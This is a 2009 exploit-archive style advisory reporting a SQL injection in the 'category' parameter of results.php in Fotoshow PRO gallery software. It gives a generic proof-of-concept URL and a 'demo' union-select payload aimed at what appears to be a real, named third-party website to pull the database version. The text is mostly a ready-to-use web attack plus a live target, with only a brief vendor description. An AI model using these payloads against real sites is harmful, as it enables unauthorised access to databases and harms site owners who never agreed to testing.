[»]====================================================================================================================[_][-][X] [»] [»] [»] Fotoshow PRO™ (category) Remote SQL Injection Vulnerability [»] [»] [»] [»] ======= ------d-------m------ ==== ==== [»] [»] || = | |(o o)| | || || || [»] [»] || = ||(~)|| || || [»] [»] ======= /|\ || || [»] [»]==========================================================================================================================[»] [»] Author : darkmasking [»] [»] Date : August, 15th 2009 [»] [»] Contact : darkmasking[at]gmail[dot]com [»] [»] Critical Level : Dangerous (*RED) [»] [»]--------------------------------------------------------------------------------------------------------------------------[»] [»] Affected software description : [»] [»] Software : Fotoshow PRO™ [»] [»] Vendor : http://www.fotoshowpro.com/ [»] [»] Price : $5,000 (USD) http://www.fotoshowpro.com/features.php \0_o/ [»] [»]==========================================================================================================================[»] [»] [»] [»] [~] SQLi POC [»] [»] [»] [»] [+] http://www.target.com/[path]/results.php?category=[SQli]` [»] [»] [»] [»] [»] [»]--------------------------------------------------------------------------------------------------------------------------[»] [»] [»] [»] [~] SQLi POC Demo [»] [»] [»] [»] [+] http://www.macduffeverton.com/stock/results.php?category=-9999 and 1=0 union select null,version(),null,null,null-- [»] [»] [»] [»]--------------------------------------------------------------------------------------------------------------------------[»] [»] [»] [»] [~] Greetz [»] [»] [»] [»] Sorry bro belum dapat teman, jadi untuk diri sendiri aja! (SELAMAT MERAYAKAN 17an | Semoga Meriah) [»] [»] [»] [»] [»] [»]==========================================================================================================================[»]